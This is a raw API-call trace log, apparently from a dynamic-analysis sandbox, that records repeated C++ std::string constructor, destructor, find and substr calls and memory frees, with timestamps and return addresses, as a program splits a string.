[0227.984] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22066b8
[0227.984] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22066c8
[0227.984] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22066d8
[0227.984] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22066e8
[0227.984] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22066f8
[0227.984] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206708
[0227.984] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206718
[0227.984] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206728
[0227.984] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206738
[0227.985] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206748
[0227.985] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206758
[0227.985] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206768
[0227.985] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206778
[0227.985] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206788
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] free (_Block=0x2202db8)
[0227.985] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.985] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.985] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x7a
[0227.985] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.985] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206798
[0227.985] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.985] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.985] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x7d
[0227.985] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.985] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.985] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.985] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22067a8
[0227.985] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.985] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.985] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x80
[0227.985] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.986] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.986] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.986] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22067b8
[0227.986] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.986] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.986] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x83
[0227.986] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.986] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.986] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.986] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22067c8
[0227.986] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.986] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.986] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x86
[0227.986] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.986] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.986] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.986] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22067d8
[0227.986] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.986] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.986] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x89
[0227.986] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.986] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.986] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.986] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22067e8
[0227.986] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.986] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.986] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x8b
[0227.986] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.986] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.986] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.986] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22067f8
[0227.986] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.986] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.986] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x8e
[0227.986] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.986] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.986] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.986] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206808
[0227.986] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.986] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.986] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x91
[0227.986] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.986] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.986] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.987] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206818
[0227.987] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.987] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.987] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x9a
[0227.987] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.987] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.987] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.987] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206828
[0227.987] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.987] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.987] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x9d
[0227.987] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.987] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.987] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.987] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206838
[0227.987] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.987] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.987] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xa0
[0227.987] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.987] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.987] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.987] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206848
[0227.987] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.987] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.987] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xa3
[0227.987] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.987] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.987] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.987] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206858
[0227.987] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.987] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.987] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xa6
[0227.987] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.987] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.987] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.987] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206868
[0227.987] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.987] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.987] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xa9
[0227.987] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.987] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.987] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.987] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206878
[0227.988] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.988] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.988] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xac
[0227.988] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.988] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.988] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.988] ??2@YAPAXI@Z () returned 0x2206890
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206890
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22068a0
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22068b0
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22068c0
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22068d0
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22068e0
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22068f0
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206900
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206910
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206920
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206930
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206940
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206950
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206960
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206970
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206980
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206990
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22069a0
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22069b0
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22069c0
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22069d0
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22069e0
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22069f0
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206a00
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206a10
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206a20
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206a30
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206a40
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206a50
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206a60
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206a70
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206a80
[0227.988] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206a90
[0227.988] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.988] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.988] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.989] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.989] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.989] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.989] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.989] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.989] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.989] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.989] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.989] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.989] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.993] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.993] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.993] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.993] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.993] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] free (_Block=0x2206688)
[0227.994] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.994] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.994] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xaf
[0227.994] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.994] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206aa0
[0227.994] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.994] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.994] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xb2
[0227.994] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.994] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.994] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.994] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206ab0
[0227.994] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.994] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.994] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xb5
[0227.994] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.995] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.995] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.995] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206ac0
[0227.995] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.995] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.995] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xb8
